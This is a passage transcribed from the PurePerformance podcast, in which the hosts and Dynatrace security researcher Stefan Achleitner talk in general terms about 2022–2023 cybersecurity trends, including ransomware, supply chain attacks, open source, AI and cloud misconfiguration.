PurePerformance - Don’t look away from the next cyber security threat with Stefan Achleitner
Episode Date: March 13, 2023While Spring4Shell, Ransomware and attacks on critical infrastructure were the most severe attacks in 2022 the evolving trends in 2023 are around the rising power of AIs, complexity and therefore misc...onfiguration of cloud native stacks as well as social engineering challenges as part of the post-pandemic shift back towards the office.Tune in and learn from Stefan Achleitner, Lead Researcher Cloud Native Security at Dynatrace, about getting better in securing software supply chain, understanding the impact of attacks and vulnerabilities and why nobody should look away when it comes to detecting and preventing cyber security threats
Transcript
Discussion (0)
It's time for Pure Performance!
Get your stopwatches ready, it's time for Pure Performance with Andy Grabner and Brian Wilson.
Hello everybody and welcome to another episode of Pure Performance.
My name is Brian Wilson and as always I have with me my co-host,
the wonderful and talented Mr. Andy Grabner.
Andy, how are you doing today?
Very good, but I'm a little surprised now because you announced that you have actually rehearsed this whole intro but it doesn't it didn't sound anything different well i haven't got to yet and i gave it away so now everyone's going to know so anyway um i got to tell you i
had a very very weird dream last night no you know you were in it you were in it so i was walking down Grubenstrab. And did I get that right?
Street?
Yeah, Straße.
Yeah, cool.
Yeah, yeah.
Okay.
And I don't know how to do that weird B character.
And suddenly I hear, hey, Brian.
And I look and it's you in an alley.
But your voice is obviously different, right?
It's very much harsher and more masculine.
And I'm like, Andy, what are you doing here in Lent?
And he's like, Brian, come here.
So I go into the alley with you, and you're like, I need to show you something.
And you pull out your phone.
You like my impersonation of you, right?
And you show me on my phone a picture of my children bound to chairs.
I'm like, Andy, what's going on here i thought we
were friends what are you doing it's like i took your children hostage if you want to get them
back you have to pay a ransom and i was like this is now a scottish accent though that you are
i'm not scottish it was like a scottish accent almost so then i'm like it was wait a minute
andy let me get this straight. You have my children hostage.
You want me to pay a ransom to get them back.
Otherwise you keep them.
You're like,
yes,
that is right.
And so I said,
all right,
well,
enjoy my kids.
Cause he just set me free.
So thanks.
Um,
but anyway,
I figured it was appropriate to bring up today because,
um,
you know,
it's,
it's,
it's,
it's,
I think a little bit on topic.
Yeah. Maybe a little bit on topic. Yeah. Maybe.
A little bit. Like how bad
of a dad you are that you didn't want to
give your kids away?
Or you're talking about
keeping the things that
are precious to you safe and
sound. And secure.
And secure, right? In the Austrian way,
for kids, we typically put them
into basements and lock them in so that nobody can steal them.
I think this is enough with the jokes today.
Yeah, exactly. I think enough with the jokes.
The topic today is security.
And Brian, I think last year or the last year and a half, when we talked about security, we often talked about log4shell and log4j. It felt like this topic kind of took over the security world,
at least in our small security world that the two of us live in,
because we are just hearing what our listeners kind of bring to us.
But to learn a little bit more about what else is out there in security,
we've actually invited Stefan Ackleitner today to the show.
Stefan, sorry for going
through all of this, trying to be funny
in the beginning, but finally
it's time for you.
I'm apologizing for jokes.
It didn't work too well. I was proud of that one,
ladies and gentlemen.
It was good.
Stefan, finally, thank you so much for being on the show.
Could you do us a favor, say hi to the audience
and quickly introduce yourself, who you are, what you do,
and why you think you're on the podcast today?
Sure, yeah. I'm very excited to be on the podcast.
So it was funny to listen to your intro.
So I'm with Dynatrace since about one year.
So my one-year anniversary is coming up soon, actually.
And I've been working in the field of cybersecurity
for about, yeah, 10, 12 years.
I actually got into it when I moved from Austria to the US,
which was about 12 years ago,
to study cybersecurity.
And then I worked a few years in California for some other security
providers, mostly focused on threat detection, attack detection, understanding how attacks work,
how you basically develop new models, new approaches for advanced attack detection.
And yeah, about a year ago, I got the chance to actually lead
the security research here at Dynatrace,
which was a very exciting opportunity
that I took.
And I'm really, really happy
about this opportunity.
And very recently,
I moved back to Austria,
where I'm originally from.
So it's nice to spend time again with family and
not just not just coming home like once a year but um yeah more more frequently so it was a
was a great combination with the dino trees the job opportunity and and uh moving again
in which lab do you work so I'm usually uh my main office is in the Vienna lab, but I'm very frequently also in Linz.
The team that we have that are working in security research, they're mostly in Linz, but also some people are in Vienna.
And Stefan, and also maybe for the audience, we will discuss a lot of topics. You did a great job in giving us some background
details on what we should discuss, what actually matters to the security aware people out there.
And folks, if you hear anything and we discuss, let's say a particular article or something
like that, and we always try to then follow up also with links. So Stefan, also for you,
if you have any additional material, write on any papers, blog posts, then we'll try to then add them to the description of the blog.
Definitely.
Yeah.
But I really want to jump into the topic because, as I said, typically when we get kind of in touch with security, and especially in the last year and a half,
most of them were centered around log4shell and log4j
and then things spring4shell.
So kind of looking back on what happened in the last year,
can you give us a little overview of what attacks were out there?
Was it really just spring4shell or log4shell?
Were there other things out there as well
that didn't make it to the news as prominently
but that everybody should
be aware of.
Yeah, actually, Log4Shell, I don't want to go into that because, as you already said,
people talk so much about it.
But if we look a year back, Log4Shell was very prominent.
And the interesting thing that just a few months after Log4Shell, Spring4Shell came
around, which was a very similar vulnerability that actually affected a lot of companies and a lot of software because it was part of the Spring framework.
And I don't want to talk too much about Spring4Shell at the moment, but maybe a little bit more later because it's a really nice example of what I think we need to do or where research needs to go to better understand those
type of vulnerabilities. So that was certainly like a big thing in the past year. One other
thing that I recently read in studies, and that was kind of surprising to me,
but you can explain it if you think about it It is that ransomware attacks are still very big.
I'm sure everybody heard about ransomware attacks, right?
When you encrypt basically the data and then ask for ransom.
And actually what we saw in about the second half of last year is that actually ransomware attacks are going down, which means
not as many companies report anymore that they were attacked by ransomware.
So we really see the trend going down.
And that is multiple reasons.
So from the very beginning, I also did a little bit of work on ransomware, but when it all
started, from the very beginning, people
always said, or organizations like the FBI, for example, in the US, and also security
providers said, don't pay the ransom, because it actually enables attackers or motivates
attackers to keep doing that, right?
And also, you fund the attackers that are doing that.
Sorry to interrupt, but this is a really interesting thought.
So basically, with giving it so much public scene,
basically, the criminals kind of learn,
hey, this is actually working and it's working pretty well,
so let's do it as well.
By talking less about it,
we can downplay the impact it can have and therefore hopefully encourage
fewer criminals to actually do it.
Do I get this right? Is this kind of the...
Somewhat, yeah, somewhat.
There are a few factors why it's going down.
One of the factors is
that it's actually getting harder to pay the ransom
um because uh if you if you look back how ransomware started basically cryptocurrencies
were an enabler for ransomware right because suddenly you can pay large amounts of money
in an anonymous way basically and this is getting harder and harder to do because countries start to regulate cryptocurrencies.
And also, if you look at big crypto exchange sites like Coinbase, for example, they have limits.
You cannot just go there and say, hey, I want to buy $2 million worth of Bitcoin.
They will not give that to you in a day. And if you tell them, oh, it's to pay off some attackers
for ransomware attack, they will not do that, right?
They will not give you the money.
So it's getting harder and harder for the victims
to actually pay it, which is a good thing.
And actually in a study that I've read last year,
people did some investigation.
Actually only 8% of the organizations that
paid a ransom got the data back, actually. Only 8%. So it's really not a good idea to pay a ransom.
And I think more and more organizations start doing that. And so the business model is basically
slowly disappearing for attackers and that's that's
why we see the trend going down so the fact that the ransomware hackers are bad businessmen and
don't give the data is ruining their own business model because people are like well if i pay you
i have an eight percent chance of getting so it's their own bad business practices which is killing
them which is funny i also imagine too and i don't know if it was i don't remember this one was in
the document and all but when we talk about the, you know, cryptocurrencies, I imagine the instability of that market is also making it less attractive for, you know, the ransomware hackers because, you know, 2 million in Bitcoin today, tomorrow might not be worth anything.
Exactly. Yeah, that is a good point.
I mean, for me, I never thought about this,
but it makes a lot of sense.
That's why we have these podcasts.
We always say, Brian and I,
we are actually the most beneficiaries of these podcasts
because we always learn so much from our guests.
And thank you so much, Stefan, for bringing this up.
Now, you also said that technology is catching up.
You mean with technology, really the defense mechanisms, I guess, right?
Yes, correct.
Correct.
Right.
Right.
So, I mean, ransomware was something new.
And, yeah, you see that the technology to detect it is just catching up.
There are frameworks out there that basically allow you to just create ransomware. And more
and more vendors detect it. So that's also like a factor. So really multiple factors come together
that we see ransomware attacks going down. And also people get more varied, but not want to say,
hey, you don't have to worry about that anymore.
You should still be very cautious about that.
Yeah, I think I just want to add in one last thing too,
that I think at least for the home market of ransomware,
this doesn't really apply to the business side of it,
but there are plenty of people
who get their computers hacked.
I actually know somebody who called me up and was like, hey hey what do i do if my computer has been ransomware hacked
i was like my first question was like well where do you back up all of your important stuff to
and he goes uh because but the thing is so many laptops your phones your devices they come pretty
much set up for you to easily turn on auto backup right so if you have an iphone
you can easily be storing all your photos all that's all that sentimental stuff that you want
to keep in backup somewhere so if someone gets your device it's like all right great you got
my device i'll throw that out and get a new one because everything else is backed up somewhere
safely i imagine that's not quite the same for businesses and the hospitals and all those other
people that are getting hacked on that side.
But to your point, the whole ecosystem for this sort of attack is diminishing returns on it.
Exactly, yeah.
Stefan, anything else to wrap up what we saw last year yeah i mean one one uh uh trend that that we've also seen is uh the um war of russia on ukraine actually also really really caused the trend that
uh we saw in uh in different malwares and um we talked about ransomware there is a financial
interest for attackers to uh an attack, right?
What we really saw when the conflict in Ukraine started is that there's suddenly malware that is
only destructive, that is really only want to disrupt critical infrastructure, really just to
wipe out computers without giving you the option to recover it.
It's a really destructive malware with no other goal than just to do damage, no financial interest.
So this was really a trend that came up in spring last year when this whole conflict started,
which was interesting to see, but also scary to see, right? That really this unfortunate
war is also really happening in cyberspace. Yeah, it's a full-on cyber war at this point,
right? Interesting. I didn't know that was going on. I think that's, yeah, I don't know. Over here,
I didn't hear about that. So that's really just, Now, if they were smart, here's an idea for them.
If they're smart, they'll be like,
you have 10 days to pay or we destroy.
And then they get some of the Bitcoin, maybe,
and then they destroy anyway.
So they get double bounty.
Brian, don't give these people
that listen to our podcast any new ideas.
Someone's thought of it.
Somebody's thought of it.
Yeah.
It's all going to be created.
That Brian Wilson. Exactly. of it somebody's thought of it yeah yeah yeah it's all gonna be created that brian wilson exactly
hey stefan it's okay that was really insightful especially for me i i guess friend somewhere
obviously was something i had on on the radar because we also heard it in austria uh i remember
certain local governments and hospitals were impacted by it and obviously the the conflict
in ukraine is is very very close to our doors here.
And that's why we hear a lot of this also in the news.
I'm moving a little further ahead now, looking at kind of current challenges, because obviously, I guess the attackers are not just making their lives harder for attackers.
But I guess they also have they will also get creative and come up with some new
things, right? If you make things harder, then people become innovative.
So what are kind of the current challenges that you see out there
in cybersecurity? Is there anything you can tell us?
Yeah, there are certainly many challenges. In general, you can say that
we're talking about the attack surface,
so basically the possibilities how to attack certain systems.
It's just growing, growing every day.
The more we are connected, the more digital products we use,
the larger our attack surface gets, basically.
That's just a fact.
One really important thing for me is that we start to better understand and start to develop better things about the software supply chain.
There were also recent attacks about the software supply chain.
I'm sure that you all heard about, for example, the attack on SolarWinds or also the attack on the colonial pipeline, which actually happened when I still lived in the U.S.
And you really saw gas prices going up on the East Coast.
And so this is really a very important angle for me in cybersecurity to better understand where certain software components are coming from.
Because if you look into modern software, it's not written from scratch, right? You use libraries that are either proprietary from vendors or that are coming from open source repositories,
for example. And so you have so many different levels and so many different angles where you could have a supply chain attack, which would basically mean someone is smuggling a piece of malicious code into your whole benign supply chain.
So that can happen that someone embeds something that harvests data from your machine into a library that maybe just draws charts, right?
And so understanding how the software is coming from,
but also understanding how software behaves and to find out how it should not behave
or what's the expected behavior and how it should not behave,
that's something I think will be becoming more and more important to be able to
detect such kind of attacks. What I mean by that is, if you think about a library that just draws
charts, right? You give it data and it gives you back a picture. If such a component would suddenly
start to, for example, send out a lot of network data that you could certainly monitor,
there is something fishy going on, right?
Like, why is it doing that?
And so to understand the behavior of certain components,
how our software is constructed,
I think this will be a key factor
in order to detect such kind of supply chain attacks
that I'm pretty sure we'll get more.
Because as I said, if you consider the whole of supply chain attacks that I'm pretty sure we'll get more. Because as I said, if you
consider the whole software supply chain, you have so many different levels where you can attack.
Yeah, this reminds me of last week we had a trace test, a company that is doing
validations of distributed traces.
And the point is, right, they are capturing distributed
traces, let's say open telemetry, you're capturing an open telemetry trace of an application that
you're testing, and then you're validating in the end, if that trace actually looks like what
you expect. So your example, rendering an image, you have this feature in a microservice, and then
you're looking at the trace trace and you're expecting it takes
that amount of time,
that amount of CPU memory,
and maybe it makes one call out
to fetch something from the file system
and that's it.
But if all of a sudden
that trace looks differently
during testing,
something has changed
and then you want to flag it.
But I also think it's interesting
that you want to probably do this
also in a production environment almost where you say, I want to keep validating if my transactions, if my code is still having kind of the same fingerprint or the same kind of behavior for certain activities.
And Brian, this also reminds me of the performance signature that we had back in the days where it's kind of like what now evolved into our quality gates yeah um but basically figuring out how is this how how does the software
behave and then kind of giving it a fingerprint and then you say if it doesn't behave that way
anymore then something has changed and if that changing behavior comes out of nowhere then this
is this is suspicious yeah i could see that being really challenging too, though,
because if you're talking about organizations
that have a really fast-paced release cycle,
like the Amazons of the world or something,
I mean, unfortunately, there's not too many regular companies
that are that fast-paced,
but that sort of thing becomes a challenge.
I think what the interesting thing is,
is the more you would try to keep up with it, like if you're just looking at the network payload and looking for large chunks of extra network to protect yourself, that, like any sort of criminal activity, is going to force the criminals to get smarter and be like, well, what if we do, instead of larger chunks, a lot smaller bits of data, but constant.
So it's a very tiny little difference.
It's going to force them to evolve, and it's always going to be this,
what they call the cat and mouse game.
But I think that's just the nature of humanity.
I guess we'll turn this into a humanity philosophical.
No, but it's just funny.
The more you try to get ahead of it, the more it forces the hackers to innovate because there's no real way to get them to stop.
Without some ideological, maybe if aliens come down and we all unite finally.
But then someone will go to work for the aliens to get our data for them anyway.
So I'm full of ideas today.
But yeah, no, very interesting stuff. I think there definitely can be some sort of fingerprints, you know, of code execution, if you will.
Yeah, exactly. This fingerprinting, this profiling of software to understand what it really does.
I think this is just very critical for cyber security.
You mentioned the term open source earlier, and I don't want to open up a can of worms here,
because I know this is a bigger discussion. But obviously, the open source, I guess it always
goes in multiple ways. But some people say, yeah, we cannot use open source because maybe the source code is open.
And if there's a vulnerability, everybody knows the vulnerability.
And then if we even say we're using this library because we make a public endorsement and they also know that we are using this library.
But I also think that open source obviously is here to stay.
And it is without open source, it wouldn't be where we are
what is your just quick take on it because without opening up we cannot work what's your what's
what can which what should open source or what can open source projects do to make sure
they're not kind of kind of labeled as yeah we not use you because of security concerns
there's a saying in security that security by obscurity usually is not a good approach.
It doesn't work, which means to just, if you hide something, if you don't tell people how
things work exactly, it doesn't mean it will be prevented that it doesn't get attacked.
And that's how I see open source.
Because if you have a large open source project where a lot of people are working on it that it doesn't get attacked. And that's how I see open source. Because if you have a large open source project
where a lot of people are working on it,
it's actually a very good vetting process
that you say, okay, I maybe have a few people
that have malicious intent,
but I think the majority of the people will have good intent.
And if it's open source, everybody can see it.
And the people that are really trustworthy
or that have good intent,
it's more likely that they catch that there's a vulnerability
or that there's a malicious piece of code in an open source repository
than if it's completely closed, right?
If you have a supply chain attack on a proprietary software,
there's only a limited group of people that can really review the code and detect it.
If we have open source, everybody can do it and a much larger group of people will potentially see it.
So from that perspective, I think we can trust open source software even more.
Yeah, it's interesting because if you think about the ones that we know of, with regard to supply chain, as you were talking about, the big one that everyone knows about was the SolarWinds.
And that was not open source.
And for all the open source advocates out there, they'll probably be really into finding it and stopping it as soon as possible to protect open source.
So they're equally motivated to be on top of it.
And if something does get found, get their heads together and fix it right away so that they don't have a tarnished reputation
and everything that they love and been working on.
Whereas a private company will be like, well, their actuaries will be like, well, this will only cost us, you know,
$3 million, which you can easily swallow and then do some PR or whatever.
Whereas the open source community, you live and die by that.
So I think, to your point, they might be a lot more motivated to stay on top.
I never really thought of it that way.
So, yeah, interesting.
Is there anything else on this kind of topic that you want to highlight before we move on?
Yeah, so you mean specifically for supply chain attacks?
Yeah, in general, like current challenges.
Yeah, so one very important thing that I also think will become more and more relevant is that we better understand the impact of certain vulnerabilities. What I mean by that, and for that, I would actually like to go back for a few seconds
to the Spring for Shell vulnerability.
If you look how this vulnerability was exploited, it had a lot of very specific conditions that
need to be fulfilled in order to exploit it.
It needs to run Java greater than nine.
It needs to be deployed on a Tomcat server.
It needs to be deployed on a VAR file, for example.
There was very specific things that were written in the vulnerability description.
So it means if anything of this was not fulfilled, you cannot exploit it.
And so if we better understand all these different conditions and the context that a certain vulnerability is in, we can much better assess the impact a certain vulnerability can have.
And so it's not always the best solution to just say, hey, just upgrade.
If you have a vulnerable Spring framework running somewhere in your environment, just upgrade.
You have to really consider the entire context, the entire infrastructure
that it's running in.
And so if we find a good way to better do that and to better understand all those conditions,
make it processable and somehow gather all this information, then we just can much better protect ourselves
because we can say, okay, I know I have this vulnerability,
but it would actually maybe be worse to replace it
with another thing, for example, right?
But I can turn a lot of other knobs, basically,
to prevent a certain exploit of this.
And I think that's great.
I mean, we don't want to use the podcast here for commercials on what we are doing
during the day, we work for Dynatrace and I think the AppSec capability that we have
exactly brings that context that you just explained.
And we know not just that there is
a particular version of log4
shell on your file system, but we know exactly
was it loaded into
an environment that meets all of the criteria.
Now, here's a question for you.
Is the
description of
vulnerabilities good enough?
That means is there a standard
that is currently already available that we get from
the vulnerability databases out there?
I know we are integrating with Snook, for instance, and maybe others as well.
Is that description that detailed, that it contains all this information, the context?
Unfortunately not.
And it sometimes has those information, but it has it in a written way.
So not like in a machine readable way, just in a human readable way.
And it's often also not accurate enough where there are mistakes in it.
And if you look at a certain vulnerability description, you have a lot of information
that maybe also points to different links, points to a repository where someone
tried out the exploit, or there's a security advisory from that
company or from another company.
If you somehow would be able to put all these things
together, then you might get all this information. But this is
incredibly hard to do. And so yeah,
short answer, no, it does not have this information. That information might be somewhere,
but it's hard to get. It's not just one click and you got what you need. It's one click and
then you might have to go do more research on the next thing and the next thing and the next thing
and then try to put that all together. That't that's completely news to me i always thought like when you read the cves or whatever it's like yep
this is all you need uh it's interesting to find out that there it's it's a lot more complicated
and you also said machine readable which i thought was very interesting because as you were you and
andy were discussing this topic i couldn't help but think about, you talked about automatically moving to the next version
to upgrade and all, but I think obviously upgrading is a large factor, keeping on top of
the latest fixes and the latest security patches. But that I think for a lot of organizations
is a hard thing to do because you update code, you got to go through a whole cycle,
you got to go through testing, verification, whatever. You update a component of your operating system,
at least in the past, they would do the same thing, right?
Because you don't know how that's going to interact
with your code or anything else.
Same thing with the packages.
Okay, yeah, we're going from Java 9 to Java 9.2.
Well, what changed in there?
How's that going to impact?
We got to go through this whole cycle.
And when you're not utilizing an automated pipeline
in this process, you're slowing yourself down.
It's not going to solve everything, but like with this whole machine-readable idea,
when people look at, do we take the time, do we slow down our release cycle to really automate our pipeline
and do things as automatically as we can to save as much time in that and be as agile in that as we can be,
oftentimes the answer is no because they
want to focus on the business but this them is putting them or increasing their vulnerability
because they cannot take action quickly they cannot stay on top of these things if it was
no problem to say okay we'll put the latest one in that'll cost us maybe a half a day in the pipe
i mean i'm just making up a thing as opposed to a week and a half in the old days fantastic you have a lot more ability to stay on top and not get hit because when you do get hit
by these things it's much much more impactful right but i think everybody as we were doing
earlier we were covering our eyes everybody likes to hide their head in the sand and say it's not
going to happen here it's not going to happen to me and we'll just keep going along as if it's not going to happen to me until it does you know and then exactly a huge price but the machine bringing it back machine
readable would would fit right into that whole bit right because then it could just be part of
this automated cycle right so right yeah as you as you say sometimes it's really hard to just
update a certain library or certain component in your entire IT system, right?
But if you say, hey, instead of updating, I can just block certain types of network packets
or limit the rate of certain type of network packets to prevent a certain vulnerability,
that might be much easier than just update a library everywhere.
Hey, Stefan, I know in your list you also had the human factor.
That's obviously a big topic.
The human is always sometimes the weakest link.
But considering that the time that we already,
we've been already more than 30 minutes in,
I would like to skip this one
and just go into the next big section
that is really interesting because,
you know, we talked about the past,
we talked about the present, but now we need to talk about what's evolving what's happening what's coming this year
what do we need to look out for what are some of the the trends that you see out there in cyber
security in 2023 yeah so ai is and will be and also was in the past year still a big, big topic for cybersecurity.
And there are really multiple angles here.
The recent developments in AI, I mean, I know everybody's just talking about chat GPT.
It's incredible.
You tell it, hey, write me a function in Python and it does it
from
or whatever you want to do it
so it's I think we will
see very soon
that AI will
develop its own malware
so that's
the trend is certainly going
into that direction
but on the other hand also AI is very important to help defend against threats, against attacks, to detect them.
You have to consider that most of the security products we currently have in the industry, and I'm talking about antivirus software, firewalls and so on, are mostly
still pattern matching and signature based.
So just I know something that happened in the past from an attack, and now I look if
I see this pattern again.
This is still like the majority how it works.
But AI can help with that because AI is not just making a zero or one decision.
AI can also understand some of the context if you have appropriate models. So AI is having an angle
and can be used for attacking, but it can also be used for defending. So it's really a double-sided
sword, as you want to say. And then maybe a third factor that we also have to consider, AI is attackable itself. It's actually
still a very hot topic in security research.
You can actually fool an AI. And I've also seen
certain tweets about ChatGPT where people ask it
something and it replied complete nonsense.
And you can do that if you that's that's actually
already like a few years ago but if you think about self-driving cars um people have been shown
that you can very easily fool how an AI for example detect certain traffic signs if you just
manipulate a few things on a stop sign that would be identified as a stop sign, right?
In AI that's in a car, for example, would identify it as a, I don't know, speed limit sign.
Because especially if you think about those very deep neural networks that are usually applied for those kinds of tasks.
Just, I would say a handful of people really understand how they work because it's such complex system and such complex mathematical systems that we don't fully understand them
yet.
And they are much easier to fool than you actually think.
And so those are really those three factors that
ai itself can be used for attacking for defending but then ai itself is not secure yet and that's
really a big a big uh research field that i think we will have to invest much more time into it yeah
so i could i could talk much, much longer about
the AI thing because
there are many
challenges but many opportunities when
it comes to AI. Also to just
make a system behave
accurately, that
it can be applied in a security context,
it's
really not trivial in the AI system.
Yeah.
It almost sounds like you're describing, at least the beginning part of the AI, the Marvel
movie version of Ultron.
As it's going through and trying to find all the attack vectors and all, it suddenly starts
realizing, oh, there's all these attack vectors.
I can take care of them and then run everything. But the simple fact of the matter, it's very interesting that you talked
about these applications with AI, because just yesterday I heard two stories about AI. One was
about chat GPT and its use in schools and how some teachers are, they know it's inevitable. They know
these things are going to be there. So they're trying to find good ways to use them. But the
other challenge teachers are finding is kids will go in and be like,
write me a paper about Wuthering Heights, right, or some book, and it's spitting out an essay for
them. So now there's the challenge of trying to detect and identify AI-written essays,
which is very similar along this other thing, right? I also heard a story on npr last night about the self-driving
car you know the tesla self-driving feature and somebody did a uh you know they did a uh a test
with it and they they described it as um being a driving instructor it's not relaxing at all it's
like being a driving instructor because you kind of have to keep your eyes on it making sure it's
not doing the wrong thing and questioning what it's doing. However, a few years, so they were
describing it almost like, I feel like I'm driving with a fourth grader behind the wheel.
But a few years ago, it felt like driving with a kindergartner behind the wheel.
And where they were going with this is, this is going to keep getting better. The AI,
whether it's security, whether it's anything, is going to keep getting better. So to your point,
we have to get on top of it.
And I think we asked this question to someone else.
I think they were originally from the United States, so they had a little bit of a conflicted view.
I'm curious as to your more worldly view.
You said with a lot of this AI stuff and the security is going to take a lot of investment. Just like with the field of antibiotics, I don't
see a desire for companies to invest into this unless there's an incentive. And that incentive
is usually in the form of harsh penalties for being in violation or having to pay a fee.
Right now, your credit card data gets stolen. They give you this meaningless,
oh, we'll keep an eye on your credit card history for a year.
And then we automatically enroll you and you start paying us.
It's all just like there's no real penalty for getting hacked.
There's no real penalty for having lax security.
But if you talk about that funding, you talk about that investment, from where you sit, you've seen a lot of the development on you know on silicon valley
side let's just say for the i'm not sure exactly where you were a bunch of different other areas
do you feel that the industry just based on your experience would actually be motivated
to put enough time and money into this without being incentivized by penalties or do you think
some sort of like you know government regulation which
Sometimes you know is not always perfect obviously
Would be required to for us to see a real improvement here
To be honest it is a very hard question to answer because
How should I start so?
Nobody likes to have or no company wants to have a security issue
of vulnerability in their product, right? And usually you don't put this in...
So vulnerabilities can happen. Systems are just so complex and that
especially is true for AI that I feel like it's often out of control
and it's hard to basically predict what can happen
and what will not happen with certain use cases.
When you, for example, put out a product
that is trained on certain data,
you don't really know how it will behave in a different environment.
That actually brings me to one important point that I have on my list,
and this is about data regulations in different geographical areas.
So as I mentioned, I've worked for many years in the United States
and I did a lot of work in
data science and training machine learning models, for example.
And I was not able to work with European data because I was sitting physically
in the United States and GDPR prevents me from looking at European
data,
which has a lot of good effects for personal privacy. But you have to also consider that
a lot of digital products that we use around the world are developed in the United States
and maybe only trained on data that is collected in the United States or in certain geographical
areas. Because of regulations like
that and especially in security you see you see different attack trends based on different
geographical locations and so so does it mean that a product that's developing that's developed
in the U.S. based on U.S. data does not work as well in Europe? Potentially, yes. But it's
hard to answer, right? So that's
what I mean. It's
sometimes out of developers' control
that you say
in whatever context my products are
applied, they might
behave in a way that I cannot
predict.
And if
penalties will motivate companies, probably to have some minimal standards, yeah,
I think. But it would not prevent all kinds of security flaws, all kinds of vulnerabilities.
Just, I would say, like a minimum level, maybe. Does that make sense?
Yeah, absolutely. and i think those are
fantastic points and i think tidying tying into that um all that kind of stuff is driven like
everything is driven by money in a lot of ways so the companies are on the hook for having that
security they're going to need products for that security right so someone developing a product
isn't going to be really incentivized to develop a good product if no one's buying it, right? But if the companies that use them will get
penalized for having flaws, then these companies will have purchases going on. That then may,
and again, I'm talking about fantasy world here, though, but that then may lead to a demand
for better, smarter regulation to say, hey, GDPR, we're doing this.
We need to have something worked out here.
And then maybe finally, on the political level, people will be like, we should really have
some smart tech people on these boards who really understand, as opposed to people who
get appointed because they donate money, right?
Because that usually seems to be the way in politics.
But if you get real data scientists, real IT people who know all these things, then you can finally get the
regulations that would be, A, good to help penalize the bad actors, but also make it plausible that we
get good products and get good flowing. But in my own personal view, I see without that penalty
on the end companies, where is the
rest of the money going to come from to support the rest of that ecosystem so that it happens?
Even with the chat GPT, you're talking about building the security and all that kind of
stuff.
Well, what's the incentive if it's not money in a business world?
But I mean, there is some stuff.
Yeah, especially with chat GPT, like who would really prevent it from...
Writing malware.
Yeah, exactly. Writing malware.
If you tell it, hey, write me a malware that does this and this, it might be able to do it.
Hey, I need to keep a little bit of an eye on the watch here because we are...
I think, first of all, Stefan, I think we should do a follow-on
because you have a long list of additional things you wanted to talk about.
And I don't want to cut you short now, because I think there is one thing that reminds me of the last recording we had.
In your documentary you share with us, you talk about the continuous move to the cloud and one, the number one thing you list there is actually misconfiguration of systems.
Often it's a source of data breaches and attacks.
Brian, we had Nico Meisenthal here just a couple of weeks ago, and he basically walked through how to hack a Kubernetes cluster.
He does a couple of these sessions, also different conferences where there's some YouTube
recordings from him. But in case you want to see it or listen to our episode, Nico Meisenthaler,
it's a great thing. So misconfiguration. And then he also mentioned that cloud is getting more
complex. Any additional thoughts on this? Because I think this is important. A lot of our listeners are obviously already in the cloud, but moving even more into the cloud.
I would like to kind of wrap this up from a security trend perspective 2023 with this
particular topic. Any additional things you want to talk about here would be awesome.
Yeah, especially what you mentioned, Kubernetes clusters is here to stay, right?
And it's getting more and more applied.
And we actually do research to understand the different impacts of vulnerabilities that you potentially have in a system that they have with different configurations that are deployed in a Kubernetes cluster deployment.
And that can really go from an attacker can almost do nothing
until an attacker can take over your entire cluster based on your Kubernetes configuration.
And so this is not only true for Kubernetes,
this is true for a lot of things that you have in the cloud.
So to really understand how all things are connected together
and how different configurations of systems impact other things that you have,
impact how attackers can exploit vulnerabilities or how they can move around in your system
if they maybe have
already one foot in the door.
That's a real interesting problem to understand and something that we need to better understand
what are those impacts of misconfiguration.
So yeah, this will be interesting to maybe do a follow-up because I think there's much
more to talk about this.
Yeah, exactly.
And Nico also, in his presentation, he did not only take over the cluster, he then got access to the tokens to the cloud vendor, the cloud provider, and then basically started spinning up virtual machines everywhere.
I mean, that's even worse.
That was giving people ideas, Andy.
It's not me. I'm, that's even worse. That was giving people ideas, Andy. It's nothing.
I'm just telling the story from Nico.
And Stefan, to conclude this, right,
I mean, it's great to know
that somebody like you
with that type of experience
stays in that field,
does the research.
And I think we can be lucky
from a talent race perspective
to have somebody like you
that is then also impacting our product.
Because I assume you're not just doing research
and talking a podcast, but a lot of the stuff that we because i assume you're not just doing research and talking
a podcast but a lot of the stuff that we are that we that you're finding out make it into better
security products and we happen to be in that field as well which is just awesome to know
exactly yeah that's that's our goal to to use all this research that we are doing that can be often very experimental, but to really get
useful features out of that that will eventually go into our product and then help customers to
better understand or to better be able to handle a lot of things that I talked about today.
Impacts of vulnerabilities, better configure system,
limit what attackers can do in a certain system.
That's what I'm very passionate about it, and I'm really,
yeah, really very glad and honored and happy that I can work in this field.
And clearly you're not looking away like we did in the beginning when we took
the picture and not looking away from all of these new threads.
Stefan, yeah.
We're looking right at it.
You're looking right at it, exactly.
Just maybe as a final word, I know in your document you had like the last section.
I think when I read it, I think there's an interesting warning
or like a stating effect
that there will be another log for Shell,
whatever it's going to be called.
We want to be prepared for it.
And I think we should all do whatever we can
to play our role.
And it may just start with something very simple.
And also reading from, again, from a document
when you talk about many of us that have,
thanks to the pandemic, only worked from home for a while
and only saw our colleagues,
maybe through a small video,
and they never turned on the video,
so we don't even know how our colleagues look like.
And then we think we meet them in person.
Maybe we don't meet that person
that colleague in person maybe it's somebody else right so i think there's a lot of a lot of things
we need to be be aware of and it starts with all of us i think from a human perspective
i could not agree more to that yeah the human factor is still the biggest factor in
in cyber security and defending against attacks and just considering
on what link you click on.
But even just the information that you share on social media, we could do another podcast
about that.
It's not just the impact from a technical side right it's the impact that information can really
have in the in the wrong hands and i think we are getting way too way too yeah we are worrying way
too much way too less what is really happening with all the information that we put out there
about ourselves that's why it's important for everybody to complete their compliance training, right?
Exactly.
It does cover some of that,
like talking about things in public.
It's funny.
On the other side, it's also sad,
especially because we're heavily involved in open source
and open source also lives from the contributions,
but also public speaking out
for that you're using an open source project. You it right it's it also lives from the advocacy and if all of a sudden companies can
no longer publicly talk about it they're using a certain project or supporting it because they
don't want to reveal the secrets it will come it will hinder some of these projects to actually
become more popular yeah it's it's a it's it popular. It's a tough world we live in.
It looks like the more popular an open source project becomes, the more
targeted it'll be because it's just a more attractive bounty.
That is true.
That is true.
I was just saying, any final words? Yeah, that is true. I probably want to say... Yeah, go on.
I was just saying, any final words?
Any final comments that you want to... Yeah, this was awesome to really talk about.
I had a lot of fun,
and I think we already have two or three more topics
that we could do a follow-up.
Yeah.
So, yeah, I'm really excited about this,
and yeah, it was fun talking with you guys.
Thanks so much for having me.
Thank you.
I think the interesting thing is, you know, we had some high-level discussion.
We've also had some lower-level discussion.
And I think that's what keeps the security discussions really interesting because there's the higher-level theory and conceptual stuff.
But then we're also diving into some of the specifics.
And one of the reasons I specifically want to have you back on is because I also think one of the keys is just having people talking about it, having people find an interest in
